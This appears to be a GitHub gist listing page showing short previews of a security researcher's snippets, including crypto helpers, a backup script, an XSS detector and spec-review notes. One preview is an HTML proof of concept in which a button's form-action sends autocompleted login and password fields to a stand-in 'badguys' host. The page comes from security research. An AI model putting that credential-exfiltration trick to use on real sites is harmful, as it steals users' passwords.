Krzysztof Kotowicz koto
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * Imports a public key to the key server. | |
| * @param {!e2e.openpgp.block.TransferablePublicKey} key The ASCII | |
| * armored or {e2e.openpgp.block.TransferablePublicKey} key to import. | |
| * @return {!e2e.async.Result.<boolean>} True if importing key is succeeded. | |
| */ | |
| e2e.openpgp.KeyClient.prototype.importPublicKey = function(key) { | |
| var uids = key.getUserIds(); | |
| if (uids.length != 1) { |
koto
/ gist:538857
Created
August 19, 2010 20:39
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Misia jest cudowna :* |
koto
/ gist:588252
Created
September 20, 2010 17:19
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import java.io.UnsupportedEncodingException; | |
| import java.security.GeneralSecurityException; | |
| import javax.crypto.Cipher; | |
| import javax.crypto.spec.DESedeKeySpec; | |
| import javax.crypto.spec.IvParameterSpec; | |
| import javax.crypto.spec.SecretKeySpec; | |
| /** | |
| * Helper class for encrypting and decrypting payloads using arbitrary string passphrases. |
koto
/ gist:588253
Created
September 20, 2010 17:19
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import java.io.UnsupportedEncodingException; | |
| import java.security.GeneralSecurityException; | |
| import javax.crypto.Cipher; | |
| import javax.crypto.spec.DESedeKeySpec; | |
| import javax.crypto.spec.IvParameterSpec; | |
| import javax.crypto.spec.SecretKeySpec; | |
| /** | |
| * Helper class for encrypting and decrypting payloads using arbitrary string passphrases. |
koto
/ arrays.php
Created
September 22, 2010 19:45
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // prepare options | |
| $a = array( | |
| 'top 1' => array( | |
| 'sub 1' => 100, | |
| 'sub 2' => array('sub sub 1' => 101, 'sub sub 2' => 102), | |
| ), | |
| 'top 2' => 103 | |
| ); |
koto
/ gist:1502692
Created
December 20, 2011 18:44
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <form action="//same-origin"> | |
| <input name=login> | |
| <input name=password type=password> | |
| .<!-- this will probably be autocompleted --> | |
| <button type=submit form-action="//badguys">clickme</button> | |
| </form> |
koto
/ rsync_backup
Created
January 16, 2012 20:35
OSX Snow Leopard bootable backup script with FileVault support (backup will be unencrypted!)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| PROG=$0 | |
| # use macports rsync 3.x - Apple's 2.6 hung on sockets | |
| RSYNC="/opt/local/bin/rsync" | |
| SRC="/" | |
| DST="/Volumes/Backup/" | |
| FILEVAULT_ACCT="Users/yourusername" | |
| # rsync options |
koto
/ credtest.php
Created
October 15, 2013 20:52
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <a id=a href="http://<?php | |
| $blacklist = ':@#"?`/\\'; | |
| for ($i = 33; $i < 255; $i++) { | |
| if (strpos($blacklist, chr($i)) !== false) { | |
| echo urlencode(chr($i)); | |
| } else | |
| //echo urlencode(chr($i)); |
koto
/ gist:8678570
Created
January 28, 2014 23:08
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://w3c.github.io/webappsec/specs/subresourceintegrity/ | |
| issues: | |
| "3.3.2 Is resource eligible for integrity validation | |
| In order to mitigate an attackers ability to read data cross-origin by brute-forcing values via integrity checks, resources are only eligible for such checks if they are same-origin, publically cachable, or is the result of a granted the loading origin explicit access via CORS. [CORS] The following algorithm details these restrictions:" | |
| publically cacheable != attacker could could read them anyway. For example - cross origin intranet resources. What if intranet resource is publicly cacheable? still allows for bruteforcing intranet resource body from internet (SOP bypass) |
koto
/ xssdetect.js
Created
December 1, 2012 22:05
reflected xss detection using xssauditor on phantomjs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var page = require('webpage').create(), | |
| system = require('system'), | |
| address; | |
| page.onInitialized = function () { | |
| page.evaluate(function () { | |
| // additional detection code here perhaps | |
| // f.e. detecting STORED/DOM XSS | |
| }); |
OlderNewer